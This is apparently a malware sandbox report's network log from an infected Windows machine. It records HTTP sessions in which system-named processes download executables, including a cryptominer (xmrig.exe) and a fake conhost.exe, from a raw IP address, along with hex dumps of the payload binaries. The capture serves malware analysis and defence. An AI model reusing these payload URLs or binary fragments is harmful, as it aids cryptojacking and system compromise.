                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037512064 CET1236INData Raw: 33 c0 83 ff 08 0f 9e c0 48 83 e0 0c 83 c0 04 8d 14 30 3b d3 7d 04 2b de 8b c3 03 f8 57 e8 70 ff ff ff 5f 5e 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56
                                                                                                                                                                                                            Data Ascii: 3H0;}+Wp_^[QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037524939 CET1236INData Raw: 8b 7d f0 33 c0 85 f6 7e 12 8b 4d fc 8b 09 03 c8 8a 0c 19 88 0c 07 40 3b c6 7c ee 8b 4d 08 8d 45 f0 50 c6 04 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b
                                                                                                                                                                                                            Data Ascii: }3~M@;|MEP7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037537098 CET1236INData Raw: ff 0f 84 96 00 00 00 ff 75 08 8d 4d f4 e8 d6 e1 ff ff 6a 5c 8d 4d f4 e8 5e e5 ff ff 8d 85 d0 fd ff ff 50 8d 4d f4 e8 72 f8 ff ff f6 85 a4 fd ff ff 10 8b 7d f4 74 35 68 88 a6 41 00 8d 85 d0 fd ff ff 50 ff 15 24 a1 41 00 85 c0 74 33 68 80 a6 41 00
                                                                                                                                                                                                            Data Ascii: uMj\M^PMr}t5hAP$At3hAP$AtWXYjWtKWAt@PSAqSAjutuAtW_3@W_3Y_^[=lAt3@Vt$VAu3@^
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.037547112 CET36INData Raw: c4 33 c0 40 5e c9 c3 55 8b ec 83 ec 5c 83 65 fc 00 53 56 57 8d 4d e0 e8 0e f4 ff ff 8b 7d 08 e9 85 02 00 00
                                                                                                                                                                                                            Data Ascii: 3@^U\eSVWM}
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.042403936 CET1236INData Raw: 8d 4d a4 e8 d0 dd ff ff 8d 4d b0 e8 c8 dd ff ff 8b 4d fc 8b 07 89 4d f8 8d 34 08 8d 4d d4 e8 e3 f3 ff ff 8a 0e 33 db eb 14 80 f9 3d 74 1d ff 75 f4 8d 4d d4 e8 d5 f4 ff ff 43 8a 0c 1e 8a c1 88 4d f4 e8 57 e7 ff ff 84 c0 74 de 68 e9 fd 00 00 8d 45
                                                                                                                                                                                                            Data Ascii: MMMM4M3=tuMCMWthEPEP^PMuZuZYY ]M M<=EMu<"t<-uulYFYuE0AFe


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.1049958147.45.47.81807188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 14, 2024 12:19:56.173187017 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: 147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017321110 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:56 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 3125704
                                                                                                                                                                                                            Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017352104 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                            Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017368078 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                                            Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017379999 CET336INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                                                                                                                                                                            Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017393112 CET1236INData Raw: 41 00 39 7e 3c 74 17 ff 33 e8 1a 1d 00 00 85 c0 59 0f 85 3e ff ff ff 6a 68 e9 2f ff ff ff 8b 03 8d 4e 34 51 50 e8 94 19 00 00 83 f8 ff 59 59 0f 84 25 01 00 00 83 f8 01 0f 84 12 01 00 00 6a 18 e8 6c 75 01 00 3b c7 59 74 0f 89 78 04 c7 00 58 a5 41
                                                                                                                                                                                                            Data Ascii: A9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017405987 CET1236INData Raw: fc 74 0b 6a 00 8d 45 bc 50 6a 04 ff 55 fc 33 c0 5f 5e 5b c9 c3 55 8b ec 83 ec 2c 53 56 57 33 ff 57 ff 15 88 a2 41 00 6a 58 50 89 45 fc ff 15 30 a0 41 00 83 f8 01 7d 03 6a 60 58 8b 35 54 a1 41 00 6a 60 6a 64 50 ff d6 83 f8 76 7c 0e 3d 91 00 00 00
                                                                                                                                                                                                            Data Ascii: tjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017419100 CET1236INData Raw: ec 83 ec 24 68 1c a6 41 00 68 c4 a5 41 00 ff 15 68 a1 41 00 50 ff 15 6c a1 41 00 85 c0 74 0c 8d 4d dc 51 ff d0 0f b7 45 dc c9 c3 33 c0 c9 c3 e8 ca ff ff ff 83 f8 09 b8 38 a6 41 00 75 05 b8 30 a6 41 00 c3 83 3d 84 e9 41 00 00 74 2a 68 40 a6 41 00
                                                                                                                                                                                                            Data Ascii: $hAhAhAPlAtMQE38Au0A=At*h@AhAhAPlAt5A%A%Ah`AhAhAPlAthAAVt$u3@^?uuu@;t3^US3EPSSSSSSh
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017431974 CET1236INData Raw: 83 66 08 00 6a 01 e8 bf fc ff ff 8b 06 8a 4c 24 08 88 08 8b 06 c6 40 01 00 c7 46 04 01 00 00 00 8b c6 5e c2 04 00 56 8b f1 83 26 00 83 66 04 00 83 66 08 00 57 8b 7c 24 0c ff 77 04 e8 89 fc ff ff 8b 0f 8b 06 8a 11 88 10 40 41 84 d2 75 f6 8b 47 04
                                                                                                                                                                                                            Data Ascii: fjL$@F^V&ffW|$w@AuGF_^D$V;F|P\^SV3W|$^8tC<;uS3@Gu_^^[VW|$;t%fw@AuGF_^Vj&N
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017446995 CET1236INData Raw: 4d 14 33 c0 39 59 04 0f 95 c0 eb 06 b0 01 eb 02 32 c0 5f 5e 5b c9 c3 55 8b ec 83 ec 18 83 3d 6c ea 41 00 03 75 0c 6a 7a e8 99 ee ff ff e9 86 00 00 00 56 57 8d 4d e8 e8 ce fa ff ff 8b 45 0c 8b 75 08 8b 0e 8b f8 0f b6 04 08 eb 17 3c 0a 74 17 3c 0d
                                                                                                                                                                                                            Data Ascii: M39Y2_^[U=lAujzVWMEu<t<tPMGuhEPEPF}_^uu5Ajjaej jSeuauaY2YU4VWME0>fS^f~Ff=x
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.017460108 CET1060INData Raw: 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9 fd 00 00 50
                                                                                                                                                                                                            Data Ascii: uhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.022397995 CET1236INData Raw: 59 59 68 c4 a6 41 00 ff 75 a4 ff 15 24 a1 41 00 85 c0 75 14 6a 3d ff 75 b0 e8 6e ed 00 00 85 c0 59 59 0f 8e 8f 00 00 00 33 db 39 1d 88 e0 41 00 be 88 e0 41 00 74 26 ff 36 ff 15 f4 a0 41 00 50 ff 36 ff 75 a4 ff 15 34 a2 41 00 83 c4 0c 85 c0 74 07
                                                                                                                                                                                                            Data Ascii: YYhAu$Auj=unYY39AAt&6AP6u4At9u9u Suu;tuHMEP?MM!iuX+uuuuW\MuXY_^[USVW}WA


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.104999378.47.21.153804952C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.259426117 CET285OUTGET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: joxi.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888104916 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Powered-By: PHP/5.4.45
                                                                                                                                                                                                            Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:11 GMT
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                            Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'0
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888128042 CET3INData Raw: 0a 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888243914 CET3INData Raw: 0a 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888415098 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Powered-By: PHP/5.4.45
                                                                                                                                                                                                            Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:11 GMT
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                            Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'0
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888525009 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Powered-By: PHP/5.4.45
                                                                                                                                                                                                            Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:11 GMT
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                            Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'0
                                                                                                                                                                                                            Nov 14, 2024 12:20:12.938081026 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Powered-By: PHP/5.4.45
                                                                                                                                                                                                            Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:11 GMT
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                            Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T*}+;$Lh~~|:Qc5,? |/0`)_;RG:Ej:|n?q/5gy:0a.9}8M|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@F*Afc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18|wKY(0t;!5+{}D?a0\K2'0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.1049995147.45.47.81806704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.667352915 CET71OUTGET /xmrig.exe HTTP/1.1
                                                                                                                                                                                                            Host: 147.45.47.81
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515544891 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:17 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 8251392
                                                                                                                                                                                                            Last-Modified: Fri, 17 May 2024 16:26:03 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "6647851b-7de800"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 [TRUNCATED]
